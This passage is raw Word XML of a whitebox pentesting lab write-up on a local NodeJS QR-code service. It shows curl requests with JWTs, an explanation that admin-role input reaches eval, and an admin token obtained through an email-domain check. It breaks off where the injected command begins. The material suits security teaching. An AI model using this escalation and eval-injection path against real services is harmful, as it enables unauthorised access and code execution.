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pic="http://schemas.openxmlformats.org/drawingml/2006/picture" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
  <w:body>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="7B0F881F" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="654"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Local Testing</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="257F7C33" wp14:textId="77777777">
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Now we need to setup a local testing environment that resembles the customer’s environment as more as possible. Luckily since is a NODEJS all the required packages are specified so we can do the following to install all the needed stuff:</w:t>
      </w:r>
      <w:r>
        <w:br/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351F3A2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660066"/>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve">cd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> ./intro_to_whitebox_pentesting</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="15B943C9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npm install</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="672A6659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8895919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Next we run the stuff via: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A35900E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┌──(root㉿kali)-[/home/millycash/Downloads/intro_to_whitebox_pentesting]</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6C68626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└─</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="880000"/>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"># npm run dev </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6E7BEAA2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 </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="31512538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&gt; academy_intro_to_whitebox_pentesting@1.0.0 dev</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="62302366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&gt; nodemon src/app.js</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="63E4A9CD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 </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="29AB559D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[nodemon] 3.0.3</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="2A2D32C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[nodemon] to restart at any time, enter `rs`</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="5E743C9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[nodemon] watching path(s): *.*</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="735DD511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[nodemon] watching extensions: js,mjs,cjs,json</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="255A96DD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[nodemon] starting `node src/app.js`</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3E2DFE5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⚡️[server]: Server is running at http://localhost:5000</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="0D8DBD4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0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0"/>
        </w:rPr>
        <w:t xml:space="preserve">⚡️[api]: APIs are running at http://localhost:5000/api</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="0A37501D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43024F3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Now we are ready to interact with our service.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57E3D63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We can get our self a token firstly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="0E8E46A3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└─</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="880000"/>
          <w:sz w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve"># curl -s -X POST -H "Content-Type: application/json" -d '{"email": "test@test.com"}' http://localhost:5000/api/auth/authenticate  </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="207B393C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{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="008800"/>
          <w:sz w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">"token"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="008800"/>
          <w:sz w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJlbWFpbCI6InRlc3RAdGVzdC5jb20iLCJyb2xlIjoidXNlciIsImlhdCI6MTcwODYwMzU2MCwiZXhwIjoxNzA4Njg5OTYwfQ.1wQYNefCWEGASFkBDWNtPvJ5BuaHX</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3A96BA4B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PR4xr2JaNUgVwc"}   </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="5DAB6C7B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7E969464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We can check for public vulnerabilities in used packages with: &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">npm audit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="68EAFBA4" wp14:textId="77777777"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  <w:t xml:space="preserve">Lastly </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">we can check the QRCode generator function by using the token from before:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3A389ACD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└─</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="880000"/>
          <w:sz w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve"># curl -s -X POST -H "Content-Type: application/json" -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJlbWFpbCI6InRlc3RAdGVzdC5jb20iLCJyb2xlIjoidXNlciIsImlh</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="0CA8A778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dCI6MTcwODYwMzU2MCwiZXhwIjoxNzA4Njg5OTYwfQ.1wQYNefCWEGASFkBDWNtPvJ5BuaHXPR4xr2JaNUgVwc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="008800"/>
          <w:sz w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">" -d '{"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="008800"/>
          <w:sz w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">": "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">this is a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="660066"/>
          <w:sz w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="008800"/>
          <w:sz w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">"}' http://localhost:5000/api/service/generate  </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6AF44B99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&lt;img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAfQAAAH0CAYAAADL1t+KAAAAAklEQVR4AewaftIAAAlfSURBVO3BQW4tVnYDQF5C+9/yiWfGhycJJHc/KlX17i8BAKY1AMC8BgCY1wAA8xoAYF4DAMxrAIB</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="2A2EAC9C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5DQAwrwEA5jUAwLwGAJjXAADzGgBgXgMAzGsAgHkNADCvAQDmNQDAvAYAmNcAAPMaAGBeAwDMawCAeQ0AMK8BAOY1AMC8BgCY1wAA8xoAYF4DAMxrAIB5DQAwrwEA5jUAwLwGAJjXAADzGgBgXgMAzGsAgHkNADCvAQDmNQDAvAYAmN</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="504DBF32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cAAPMaAGBeAwDMawCAeQ0AMK8BAOY1AMC8BgCY1wAA8xoAYF4DAMxrAIB5DQAwrwEA5jUAwLwGAJjXAADzGgBgXgMAzGsAgHkNADCvAQDmNQDAvAYAmNcAAPMaAGDeV/iH91743e4un+K9l09wd/mu915+wt3lu9574Xe7u/C3BgCY1</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="38339786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wAA8xoAYF4DAMxrAIB5DQAwrwEA5jUAwLwGAJjXAADzGgBgXgMAzGsAgHkNADCvAQDmNQDAvAYAmPcV/jV3F37eey/86e7yCe4uv8ndhZ/33gs/rwEA5jUAwLwGAJjXAADzGgBgXgMAzGsAgHkNADCvAQDmNQDAvAYAmNcAAPMaAGBe</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="4461CA51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AwDMawCAeQ0AMO8rfLT3Xn6Tu8tv8d7Lb/Ley6e4u/wW7738JncXPlMDAMxrAIB5DQAwrwEA5jUAwLwGAJjXAADzGgBgXgMAzGsAgHkNADCvAQDmNQDAvAYAmNcAAPMaAGDeV4D/qrvLJ7i7fNd7L8B/RwMAzGsAgHkNADCvAQDmNQD</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="76DCE871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AvAYAmNcAAPMaAGBeAwDMawCAeQ0AMK8BAOY1AMC8BgCY1wAA8xoAYN5XgHnvvXzX3QXY1QAA8xoAYF4DAMxrAIB5DQAwrwEA5jUAwLwGAJjXAADzGgBgXgMAzGsAgHkNADCvAQDmNQDAvAYAmNcAAPO+wke7uwC77i7wn9AAAPMaAG</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="0758262F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BeAwDMawCAeQ0AMK8BAOY1AMC8BgCY1wAA8xoAYF4DAMxrAIB5DQAwrwEA5jUAwLwGAJj3Ff41770Au957gRUNADCvAQDmNQDAvAYAmNcAAPMaAGBeAwDMawCAeQ0AMK8BAOY1AMC8BgCY1wAA8xoAYF4DAMxrAIB5X+Ef7i7wn/Ley</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="7C4EF6C0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3fdXfjT3QX+P2kAgHkNADCvAQDmNQDAvAYAmNcAAPMaAGBeAwDMawCAeQ0AMK8BAOY1AMC8BgCY1wAA8xoAYF4DAMz7Cv/w3stPuLt813sv/Ly7y3fdXT7Fey/86b0Xft7dhc/UAADzGgBgXgMAzGsAgHkNADCvAQDmNQDAvAYAmNcA</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6CF85CE7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APMaAGBeAwDMawCAeQ0AMK8BAOY1AMC8BgCY1wAA877Cv+a9l09wd/mu915+wt3lt3jvhT/dXT7F3eW73nv5FHeX3+K9l59wd+FvDQAwrwEA5jUAwLwGAJjXAADzGgBgXgMAzGsAgHkNADCvAQDmNQDAvAYAmNcAAPMaAGBeAwDMawC</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="5E74A68B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AeV/hH+4uP+G9l9/i7vIp3nv5BHeXn/Dey3fdXb7rvZfveu/lJ9xdfou7y6d47+UT3F34eQ0AMK8BAOY1AMC8BgCY1wAA8xoAYF4DAMxrAIB5DQAwrwEA5jUAwLwGAJjXAADzGgBgXgMAzGsAgHnv/hL+8N7LT7i7fIL3Xn6Tuwt/eu</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6BBD617B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/lE9xdfsJ7L991d/kE7738JncXPlMDAMxrAIB5DQAwrwEA5jUAwLwGAJjXAADzGgBgXgMAzGsAgHkNADCvAQDmNQDAvAYAmNcAAPMaAGDeV+B/4e7yE957+a73Xr7r7vIp3nv5BHeX73rv5SfcXb7rvZdPcHf5Td57+a67Cz+vAQDmN</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="73AE6414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QDAvAYAmNcAAPMaAGBeAwDMawCAeQ0AMK8BAOY1AMC8BgCY1wAA8xoAYF4DAMxrAIB5DQAwrwEA5r37S4D/s/defsLd5RO89/Jddxf+9N7LT7i7fIL3Xj7F3YW/NQDAvAYAmNcAAPMaAGBeAwDMawCAeQ0AMK8BAOY1AMC8BgCY1wAA</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6E18AA32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8xoAYF4DAMxrAIB5DQAwrwEA5r37S/jDey/8bneXT/HeCz/v7vKbvPfyW9xd+HkNADCvAQDmNQDAvAYAmNcAAPMaAGBeAwDMawCAeQ0AMK8BAOY1AMC8BgCY1wAA8xoAYF4DAMxrAIB5X+Ffc3fh57338gnee/kJd5dP8N7Lp7i78Jn</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="70E22408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uLt/13stPuLvwtwYAmNcAAPMaAGBeAwDMawCAeQ0AMK8BAOY1AMC8BgCY1wAA8xoAYF4DAMxrAIB5DQAwrwEA5jUAwLyv8NHee/lN7i78vPde+NN7L/zp7vJd773wmRoAYF4DAMxrAIB5DQAwrwEA5jUAwLwGAJjXAADzGgBgXgMAzG</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="306DF03D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sAgHkNADCvAQDmNQDAvAYAmNcAAPMaAGDeV4B5dxf+dHf5rvdePsXd5bvee/muuwufqQEA5jUAwLwGAJjXAADzGgBgXgMAzGsAgHkNADCvAQDmNQDAvAYAmNcAAPMaAGBeAwDMawCAeQ0AMO8rwH/Vey/86e7yCe4un+K9l++6u/B7N</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="2080E74E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QDAvAYAmNcAAPMaAGBeAwDMawCAeQ0AMK8BAOY1AMC8BgCY1wAA8xoAYF4DAMxrAIB5DQAwrwEA5n2Fj3Z34TPdXX7Cey/fdXf5BO+9/IT3Xr7r7vJd7718193lJ9xdvuu9l++6u/CZGgBgXgMAzGsAgHkNADCvAQDmNQDAvAYAmNcA</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="41956EF8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APMaAGBeAwDMawCAeQ0AMK8BAOY1AMC8BgCY1wAA877Cv+a9F36v915+k/defpP3XvjT3eW73nv5rrsLP68BAOY1AMC8BgCY1wAA8xoAYF4DAMxrAIB5DQAwrwEA5jUAwLwGAJjXAADzGgBgXgMAzGsAgHkNADCvAQDmvftLAIBpDQA</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="03F73813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wrwEA5jUAwLwGAJjXAADzGgBgXgMAzGsAgHkNADCvAQDmNQDAvAYAmNcAAPMaAGBeAwDMawCAeQ0AMK8BAOY1AMC8BgCY1wAA8xoAYF4DAMxrAIB5DQAwrwEA5jUAwLwGAJjXAADzGgBgXgMAzGsAgHkNADCvAQDmNQDAvAYAmNcAAP</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="288CB630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MaAGBeAwDMawCAeQ0AMK8BAOY1AMC8BgCY1wAA8xoAYF4DAMxrAIB5DQAwrwEA5jUAwLwGAJjXAADzGgBgXgMAzGsAgHkNADCvAQDmNQDAvAYAmNcAAPMaAGBeAwDMawCAeQ0AMK8BAOY1AMC8/wEif/7fzGB60gAAAABJRU5ErkJgg</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="7A662BE3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g==</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="008800"/>
          <w:sz w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">" alt="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">QR Code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="008800"/>
          <w:sz w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">" /&gt; </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="02EB378F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42EFD43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As you can see we got the QRCode generated! If we want to see it and analyze it we need to save it as HTML and then use a QRCODE reader from a phone or similar to decode it’s value.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6A05A809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48565CEE" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="656"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Debug time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="7C0FFECD" wp14:textId="77777777">
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Now run a debug directly from VSCODE and set a breakpoint at line 20 in service-controllers.js </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="5A39BBE3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7404781" wp14:editId="7777777">
                <wp:extent cx="4397715" cy="172949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4729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397714" cy="1729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8B1FEEB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width:346.28pt;height:136.18pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" o:spid="_x0000_s0" stroked="false" type="#_x0000_t75">
                <v:imagedata o:title="" r:id="rId10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51FFB3E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As you see we successfully stopped the APP before the string validiation. On the left menu we can see the values that have been passed and what values are they getting.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="34D27C84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Now if we want to taget the Validate string we need do understand the code:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="41C8F396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99859BD" wp14:editId="7777777">
                <wp:extent cx="4514029" cy="26869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8316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514029" cy="2686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155471FE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" style="width:355.44pt;height:211.57pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" o:spid="_x0000_s1" stroked="false" type="#_x0000_t75">
                <v:imagedata o:title="" r:id="rId11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43828B4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In this case when the GenerateQR calls the fuction Validatesttring if the role == “admin” then an error 403 is throwed and passed to the eval (from Validatestring function).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="130F7106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OBS: if role isn’t admin then only a text message will be returned and eval is not called in action.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72A3D3EC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3FC1807" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="656"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Obtaining a Admin token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="1EA97064" wp14:textId="77777777">
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">From the code we can see that if the email used to login to an user contains the domain hackthebox.eu then you will get a token like admin which enables the verbose output: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0D0B940D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4EAF148" wp14:editId="7777777">
                <wp:extent cx="3581113" cy="287601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158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581112" cy="2876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D41CC2A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2" style="width:281.98pt;height:226.46pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" o:spid="_x0000_s2" stroked="false" type="#_x0000_t75">
                <v:imagedata o:title="" r:id="rId12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0E27B00A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41A96AB1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So firstly we get the token as admin:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="57EAE0BA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└─</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="880000"/>
          <w:sz w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve"># curl -s -X POST -H "Content-Type: application/json" -d '{"email": "test@hackthebox.com"}' http://localhost:5000/api/auth/authenticate</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="4F6584BE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 </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="1D66AFE8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{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="008800"/>
          <w:sz w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">"token"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="008800"/>
          <w:sz w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJlbWFpbCI6InRlc3RAaGFja3RoZWJveC5jb20iLCJyb2xlIjoiYWRtaW4iLCJpYXQiOjE3MDg2MTAyOTUsImV4cCI6MTcwODY5NjY5NX0.FG4J8MDW5iuBjyvvY5Au</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3C654B8B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nd4Ryv3XcjqFZSzd7UkRYdc"} </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="60061E4C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BD7A0A8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And now sending a text we can see it works by adding a malicious command:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="75BA9425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└─</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="880000"/>
          <w:sz w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve"># curl -s -X POST -H "Content-Type: application/json" -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJlbWFpbCI6InRlc3RAaGFja3RoZWJveC5jb20iLCJyb2xlIjoiYWRt</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="417CD57B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aW4iLCJpYXQiOjE3MDg2MTAyOTUsImV4cCI6MTcwODY5NjY5NX0.FG4J8MDW5iuBjyvvY5Aund4Ryv3XcjqFZSzd7UkRYdc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="008800"/>
          <w:sz w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">" -d '{"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
